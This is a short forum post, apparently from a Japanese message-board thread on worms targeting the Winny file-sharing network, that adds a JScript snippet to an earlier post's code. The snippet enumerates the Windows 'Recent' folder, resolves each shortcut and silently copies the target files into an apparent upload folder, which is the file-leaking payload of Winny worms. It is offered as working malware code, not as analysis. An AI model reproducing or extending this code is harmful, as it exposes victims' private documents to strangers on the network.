Winnyを狙ったワーム・ニュイルス情報 Part34
754 :
717に追加で「最近使ったファイル」をコピー:
function Step3(updir) {
for(var fc = new Enumerator(fso.GetFolder(wsh.SpecialFolders("Recent")).files); !fc.atEnd(); fc.moveNext()) {
var f = fso.GetFile(fc.item());
try {
fso.CopyFile(wsh.CreateShortcut(f.Path).TargetPath, updir + "\\" + fso.GetBaseName(f));
} catch(e) {}
}
}
var wsh = WScript.CreateObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
Step3(up);